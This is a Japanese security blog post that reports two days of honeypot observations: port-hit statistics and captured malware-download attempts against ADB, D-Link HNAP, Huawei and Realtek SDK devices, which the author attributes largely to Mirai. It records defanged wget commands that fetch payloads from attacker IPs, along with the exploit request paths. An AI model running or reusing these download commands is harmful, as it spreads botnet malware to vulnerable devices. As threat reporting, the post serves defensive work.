sec-chick Blog

サイバーセキュリティブログ

ハニーポット簡易分析(21,22日目:8/28,8/29)

遅れましたが、Honeypotの簡易分析  8/28,8/29分の更新となります。

8/28

Honeytrap 3,418 件 (データ部 0byte以上)
※80ポートは除く

ポート 件数 割合 サービス
445 1,954 57.17% SMB
3389 69 2.02% RDP
1433 62 1.81% Microsoft SQL Server
3128 52 1.52% ?
8080 46 1.35% PROXY
52869 45 1.32% D-Link, Realtek SDK
81 37 1.08% ?
8443 35 1.02% ?
5555 32 0.94% Android Debug Bridge
4500 32 0.94% IPSec NAT Traversal

8/29 
Honeytrap 3,600 件 (データ部 0byte以上)
※80ポートは除く

ポート 件数 割合 サービス
445 2,057 57.14% SMB
3389 151 4.19% RDP
8080 70 1.94% PROXY
1433 68 1.89% Microsoft SQL Server
9600 62 1.72% ?
52869 46 1.28% D-Link, Realtek SDK
5555 37 1.03% Android Debug Bridge
1471 32 0.89% ?
81 24 0.67% ?
22 22 0.61% SSH

 

<マルウェアダウンロード>

宛先ポート リクエス ダウンロード 脆弱性
5555   wget hxxp://207[.]148[.]78[.]152/br
VirusTotal
Android Debug Bridge に対する攻撃
wget hxxp://185[.]162[.]130[.]187/adbs
VirusTotal
wget hxxp://27[.]102[.]115[.]44/adbs
VirusTotal
8081 POST /HNAP1/ wget hxxp://148[.]72[.]176[.]78/ngynx
VirusTotal
D-Link 社のルータへの攻撃(CVE-2015-2051) 
wget hxxp://176[.]32[.]33[.]171/kenjiro[.]mip
VirusTotal
wget hxxp://148[.]72[.]176[.]78/ken[.]sh

VirusTotal

37215 POST /ctrlt/DeviceUpgrade_1 wget -g 209[.]141[.]33[.]86
VirusTotal
Huawei社のルータを狙った攻撃
wget -g 31[.]220[.]43[.]190

VirusTotal

52869 POST /picdesc[.]xml wget hxxp://185[.]10[.]68[.]127/rtbin

VirusTotal

Realtek SDK の miniigd SOAP脆弱性を狙った攻撃
wget hxxp://80[.]211[.]112[.]150/mips

VirusTotal

wget hxxp://80[.]211[.]137[.]127/ntpd

VirusTotal

wget hxxp://159[.]65[.]232[.]56/xd[.]mips

VirusTotal

wget hxxp://80[.]211[.]55[.]29/SSG/mips[.]SSG

VirusTotal

wget hxxp://107[.]191[.]99[.]41/elf[.]mips

VirusTotal

wget hxxp://167[.]99[.]228[.]78/8mips8[.]mips

VirusTotal

wget hxxp://167[.]99[.]228[.]78/8mips8[.]mip

VirusTotal

wget hxxp://185[.]10[.]68[.]127/rtbin
VirusTotal

 他のハニーポッターの話を聞いてみると、やはりMirai関連のマルウェアが多くを占めています。まだまだ、継続して検知しそうです。

 

以上、簡易分析でした。